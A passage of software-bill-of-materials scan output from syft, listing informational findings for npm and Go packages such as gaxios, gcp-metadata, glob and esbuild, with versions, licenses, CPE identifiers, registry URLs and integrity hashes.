mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 2b4f03d780920bbf
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: fsevents 2.3.3'
title: fsevents 2.3.3
description: 'Package discovered: fsevents 2.3.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 585a401b2834ec08
name: fsevents
version: 2.3.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:fsevents:fsevents:2.3.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/fsevents@2.3.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/fsevents/-/fsevents-2.3.3.tgz
integrity: sha512-5xoDfX+fL7faATnagmWPpbFtwh/R77WmMMqqHGS65C3vvB0YHrgF+B1YmZ3441tMj5n63k0212XNoJwzlhffQw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: ed6c41b4eae5b77e
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: function-bind 1.1.2'
title: function-bind 1.1.2
description: 'Package discovered: function-bind 1.1.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: a9db1e71931f56ac
name: function-bind
version: 1.1.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:function-bind:function-bind:1.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:function-bind:function_bind:1.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:function_bind:function-bind:1.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:function_bind:function_bind:1.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:function:function-bind:1.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:function:function_bind:1.1.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/function-bind@1.1.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz
integrity: sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 1567b7d3e95e72e5
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: functional-red-black-tree 1.0.1'
title: functional-red-black-tree 1.0.1
description: 'Package discovered: functional-red-black-tree 1.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 06c01b9cd08a3446
name: functional-red-black-tree
version: 1.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:functional-red-black-tree:functional-red-black-tree:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:functional-red-black-tree:functional_red_black_tree:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:functional_red_black_tree:functional-red-black-tree:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:functional_red_black_tree:functional_red_black_tree:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:functional-red-black:functional-red-black-tree:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:functional-red-black:functional_red_black_tree:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:functional_red_black:functional-red-black-tree:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:functional_red_black:functional_red_black_tree:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:functional-red:functional-red-black-tree:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:functional-red:functional_red_black_tree:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:functional_red:functional-red-black-tree:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:functional_red:functional_red_black_tree:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:functional:functional-red-black-tree:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:functional:functional_red_black_tree:1.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/functional-red-black-tree@1.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/functional-red-black-tree/-/functional-red-black-tree-1.0.1.tgz
integrity: sha512-dsKNQNdj6xA3T+QlADDA7mOSlX0qiMINjn0cgr+eGHGsbSHzTabcIogz2+p/iqP1Xs6EP/sS2SbqH+brGTbq0g==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 2d3340f07fdb7b3f
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: gaxios 6.7.1'
title: gaxios 6.7.1
description: 'Package discovered: gaxios 6.7.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 9d900b217a57abee
name: gaxios
version: 6.7.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:gaxios:gaxios:6.7.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/gaxios@6.7.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/gaxios/-/gaxios-6.7.1.tgz
integrity: sha512-LDODD4TMYx7XXdpwxAVRAIAuB0bzv0s+ywFonY46k126qzQHT9ygyoa9tncmOiQmmDrik65UYsEkv3lbfqQ3yQ==
dependencies:
extend: ^3.0.2
https-proxy-agent: ^7.0.1
is-stream: ^2.0.0
node-fetch: ^2.6.9
uuid: ^9.0.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 88029de581a160cb
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: gcp-metadata 6.1.1'
title: gcp-metadata 6.1.1
description: 'Package discovered: gcp-metadata 6.1.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: aa3886c02ba5c2c5
name: gcp-metadata
version: 6.1.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:gcp-metadata:gcp-metadata:6.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:gcp-metadata:gcp_metadata:6.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:gcp_metadata:gcp-metadata:6.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:gcp_metadata:gcp_metadata:6.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:gcp:gcp-metadata:6.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:gcp:gcp_metadata:6.1.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/gcp-metadata@6.1.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/gcp-metadata/-/gcp-metadata-6.1.1.tgz
integrity: sha512-a4tiq7E0/5fTjxPAaH4jpjkSv/uCaU2p5KC6HVGrvl0cDjA8iBZv4vv1gyzlmK0ZUKqwpOyQMKzZQe3lTit77A==
dependencies:
gaxios: ^6.1.1
google-logging-utils: ^0.0.2
json-bigint: ^1.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: c4a7ba3815d4fc91
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: get-caller-file 2.0.5'
title: get-caller-file 2.0.5
description: 'Package discovered: get-caller-file 2.0.5'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: adc0dd4bf4f30c10
name: get-caller-file
version: 2.0.5
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:get-caller-file:get-caller-file:2.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:get-caller-file:get_caller_file:2.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:get_caller_file:get-caller-file:2.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:get_caller_file:get_caller_file:2.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:get-caller:get-caller-file:2.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:get-caller:get_caller_file:2.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:get_caller:get-caller-file:2.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:get_caller:get_caller_file:2.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:get:get-caller-file:2.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:get:get_caller_file:2.0.5:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/get-caller-file@2.0.5
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz
integrity: sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: fcd2d596421aca4c
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: get-intrinsic 1.3.0'
title: get-intrinsic 1.3.0
description: 'Package discovered: get-intrinsic 1.3.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 338eac46e71d483e
name: get-intrinsic
version: 1.3.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:get-intrinsic:get-intrinsic:1.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:get-intrinsic:get_intrinsic:1.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:get_intrinsic:get-intrinsic:1.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:get_intrinsic:get_intrinsic:1.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:get:get-intrinsic:1.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:get:get_intrinsic:1.3.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/get-intrinsic@1.3.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/get-intrinsic/-/get-intrinsic-1.3.0.tgz
integrity: sha512-9fSjSaos/fRIVIp+xSJlE6lfwhES7LNtKaCBIamHsjr2na1BiABJPo0mOjjz8GJDURarmCPGqaiVg5mfjb98CQ==
dependencies:
call-bind-apply-helpers: ^1.0.2
es-define-property: ^1.0.1
es-errors: ^1.3.0
es-object-atoms: ^1.1.1
function-bind: ^1.1.2
get-proto: ^1.0.1
gopd: ^1.2.0
has-symbols: ^1.1.0
hasown: ^2.0.2
math-intrinsics: ^1.1.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 13f511e3eb23bc5c
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: get-proto 1.0.1'
title: get-proto 1.0.1
description: 'Package discovered: get-proto 1.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 64572c87855a75b1
name: get-proto
version: 1.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:get-proto:get-proto:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:get-proto:get_proto:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:get_proto:get-proto:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:get_proto:get_proto:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:get:get-proto:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:get:get_proto:1.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/get-proto@1.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/get-proto/-/get-proto-1.0.1.tgz
integrity: sha512-sTSfBjoXBp89JvIKIefqw7U2CCebsc74kiY6awiGogKtoSGbgjYE/G/+l9sF3MWFPNc9IcoOC4ODfKHfxFmp0g==
dependencies:
dunder-proto: ^1.0.1
es-object-atoms: ^1.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 9565869711547f61
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /node_modules/@esbuild/darwin-arm64/bin/esbuild
startLine: 0
message: 'Package discovered: github.com/evanw/esbuild v0.0.0-20240609211631-fc37c2fa9de2'
title: github.com/evanw/esbuild v0.0.0-20240609211631-fc37c2fa9de2
description: 'Package discovered: github.com/evanw/esbuild v0.0.0-20240609211631-fc37c2fa9de2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 0b617a8d86aea060
name: github.com/evanw/esbuild
version: v0.0.0-20240609211631-fc37c2fa9de2
type: go-module
foundBy: go-module-binary-cataloger
locations:
- path: /node_modules/@esbuild/darwin-arm64/bin/esbuild
accessPath: /node_modules/@esbuild/darwin-arm64/bin/esbuild
annotations:
evidence: primary
licenses: []
language: go
cpes:
- cpe: cpe:2.3:a:evanw:esbuild:v0.0.0-20240609211631-fc37c2fa9de2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:golang/github.com/evanw/esbuild@v0.0.0-20240609211631-fc37c2fa9de2
metadataType: go-module-buildinfo-entry
metadata:
goBuildSettings:
- key: -buildmode
value: exe
- key: -compiler
value: gc
- key: -trimpath
value: 'true'
- key: CGO_ENABLED
value: '0'
- key: GOARCH
value: arm64
- key: GOOS
value: darwin
- key: vcs
value: git
- key: vcs.revision
value: fc37c2fa9de2ad77476a6d4a8f1516196b90187e
- key: vcs.time
value: '2024-06-09T21:16:31Z'
- key: vcs.modified
value: 'false'
goCompiledVersion: go1.20.12
architecture: arm64
mainModule: github.com/evanw/esbuild
goCryptoSettings:
- standard-crypto
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 701c2b7f153ed08a
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /node_modules/esbuild/bin/esbuild
startLine: 0
message: 'Package discovered: github.com/evanw/esbuild v0.0.0-20240609211631-fc37c2fa9de2'
title: github.com/evanw/esbuild v0.0.0-20240609211631-fc37c2fa9de2
description: 'Package discovered: github.com/evanw/esbuild v0.0.0-20240609211631-fc37c2fa9de2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 0dc26b5347e8f4df
name: github.com/evanw/esbuild
version: v0.0.0-20240609211631-fc37c2fa9de2
type: go-module
foundBy: go-module-binary-cataloger
locations:
- path: /node_modules/esbuild/bin/esbuild
accessPath: /node_modules/esbuild/bin/esbuild
annotations:
evidence: primary
licenses: []
language: go
cpes:
- cpe: cpe:2.3:a:evanw:esbuild:v0.0.0-20240609211631-fc37c2fa9de2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:golang/github.com/evanw/esbuild@v0.0.0-20240609211631-fc37c2fa9de2
metadataType: go-module-buildinfo-entry
metadata:
goBuildSettings:
- key: -buildmode
value: exe
- key: -compiler
value: gc
- key: -trimpath
value: 'true'
- key: CGO_ENABLED
value: '0'
- key: GOARCH
value: arm64
- key: GOOS
value: darwin
- key: vcs
value: git
- key: vcs.revision
value: fc37c2fa9de2ad77476a6d4a8f1516196b90187e
- key: vcs.time
value: '2024-06-09T21:16:31Z'
- key: vcs.modified
value: 'false'
goCompiledVersion: go1.20.12
architecture: arm64
mainModule: github.com/evanw/esbuild
goCryptoSettings:
- standard-crypto
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 0bd7d35ef088b0fd
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: glob 10.5.0'
title: glob 10.5.0
description: 'Package discovered: glob 10.5.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 8da722cb9983d6b3
name: glob
version: 10.5.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:isaacs:glob:10.5.0:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/glob@10.5.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/glob/-/glob-10.5.0.tgz
integrity: sha512-DfXN8DfhJ7NH3Oe7cFmu3NCu1wKbkReJ8TorzSAFbSKrlNaQSKfIzqYqVY8zlbs2NLBbWpRiU52GX2PbaBVNkg==
dependencies:
foreground-child: ^3.1.0
jackspeak: ^3.1.2
minimatch: ^9.0.4
minipass: ^7.1.2
package-json-from-dist: ^1.0.0
path-scurry: ^1.11.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 282a3bcad6a151e3
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: glob-parent 5.1.2'
title: glob-parent 5.1.2
description: 'Package discovered: glob-parent 5.1.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: e9e84f484cfaf367
name: glob-parent
version: 5.1.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:gulpjs:glob-parent:5.1.2:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/glob-parent@5.1.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/glob-parent/-/glob-parent-5.1.2.tgz
integrity: sha512-AOIgSQCepiJYwP3ARnGx+5VnTu2HBYdzbGP45eLw1vr3zB3vZLeyed1sC9hnbcOc9/SrMyM5RPQrkGz4aS9Zow==
dependencies:
is-glob: ^4.0.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 4709c0ff6455a8d2
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: glob-parent 6.0.2'
title: glob-parent 6.0.2
description: 'Package discovered: glob-parent 6.0.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 1644b4942c7696f6
name: glob-parent
version: 6.0.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:gulpjs:glob-parent:6.0.2:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/glob-parent@6.0.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/glob-parent/-/glob-parent-6.0.2.tgz
integrity: sha512-XxwI8EOhVQgWp6iDL+3b0r86f4d6AX6zSU55HfB4ydCEuXLXc5FcYeOu+nnGftS4TEju/11rt4KJPTMgbfmv4A==
dependencies:
is-glob: ^4.0.3
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 0dbbd23e15d1e62b
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /node_modules/@esbuild/darwin-arm64/bin/esbuild
startLine: 0
message: 'Package discovered: golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8'
title: golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8
description: 'Package discovered: golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 7890a665ce9e5849
name: golang.org/x/sys
version: v0.0.0-20220715151400-c0bba94af5f8
type: go-module
foundBy: go-module-binary-cataloger
locations:
- path: /node_modules/@esbuild/darwin-arm64/bin/esbuild
accessPath: /node_modules/@esbuild/darwin-arm64/bin/esbuild
annotations:
evidence: primary
licenses: []
language: go
cpes:
- cpe: cpe:2.3:a:golang:x\/sys:v0.0.0-20220715151400-c0bba94af5f8:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:golang/golang.org/x/sys@v0.0.0-20220715151400-c0bba94af5f8
metadataType: go-module-buildinfo-entry
metadata:
goCompiledVersion: go1.20.12
architecture: arm64
h1Digest: h1:0A+M6Uqn+Eje4kHMK80dtF3JCXC4ykBgQG4Fe06QRhQ=
mainModule: github.com/evanw/esbuild
goCryptoSettings:
- standard-crypto
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 5c6e328f37ad400d
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /node_modules/esbuild/bin/esbuild
startLine: 0
message: 'Package discovered: golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8'
title: golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8
description: 'Package discovered: golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 839067488ff020a0
name: golang.org/x/sys
version: v0.0.0-20220715151400-c0bba94af5f8
type: go-module
foundBy: go-module-binary-cataloger
locations:
- path: /node_modules/esbuild/bin/esbuild
accessPath: /node_modules/esbuild/bin/esbuild
annotations:
evidence: primary
licenses: []
language: go
cpes:
- cpe: cpe:2.3:a:golang:x\/sys:v0.0.0-20220715151400-c0bba94af5f8:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:golang/golang.org/x/sys@v0.0.0-20220715151400-c0bba94af5f8
metadataType: go-module-buildinfo-entry
metadata:
goCompiledVersion: go1.20.12
architecture: arm64
h1Digest: h1:0A+M6Uqn+Eje4kHMK80dtF3JCXC4ykBgQG4Fe06QRhQ=
mainModule: github.com/evanw/esbuild
goCryptoSettings:
- standard-crypto
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
